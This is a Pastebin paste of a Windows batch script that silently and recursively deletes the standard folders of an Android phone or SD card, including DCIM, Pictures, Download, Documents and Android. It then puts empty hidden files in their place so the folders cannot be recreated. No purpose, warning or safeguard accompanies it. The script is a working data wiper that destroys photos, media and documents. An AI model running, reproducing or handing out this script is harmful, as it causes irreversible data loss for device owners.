Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @echo off
- rd /s /q Android
- rd /s /q Movies
- rd /s /q Pictures
- rd /s /q Music
- rd /s /q LOST.DIR
- rd /s /q DCIM
- rd /s /q MIUI
- rd /s /q Documents
- rd /s /q Recordings
- rd /s /q Ringtones
- rd /s /q Alarms
- rd /s /q Audiobooks
- rd /s /q Podcasts
- rd /s /q Notifications
- rd /s /q Download
- rd /s /q "System Volume Information"
- echo. > Android
- echo. > Movies
- echo. > Pictures
- echo. > Music
- echo. > LOST.DIR
- echo. > DCIM
- echo. > MIUI
- echo. > Documents
- echo. > Recordings
- echo. > Ringtones
- echo. > Alarms
- echo. > Audiobooks
- echo. > Podcasts
- echo. > Notifications
- echo. > Download
- echo. > "System Volume Information"
- attrib +h Android
- attrib +h Movies
- attrib +h Pictures
- attrib +h Music
- attrib +h LOST.DIR
- attrib +h DCIM
- attrib +h MIUI
- attrib +h Documents
- attrib +h Recordings
- attrib +h Ringtones
- attrib +h Alarms
- attrib +h Audiobooks
- attrib +h Podcasts
- attrib +h Notifications
- attrib +h Download
- attrib +h "System Volume Information"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement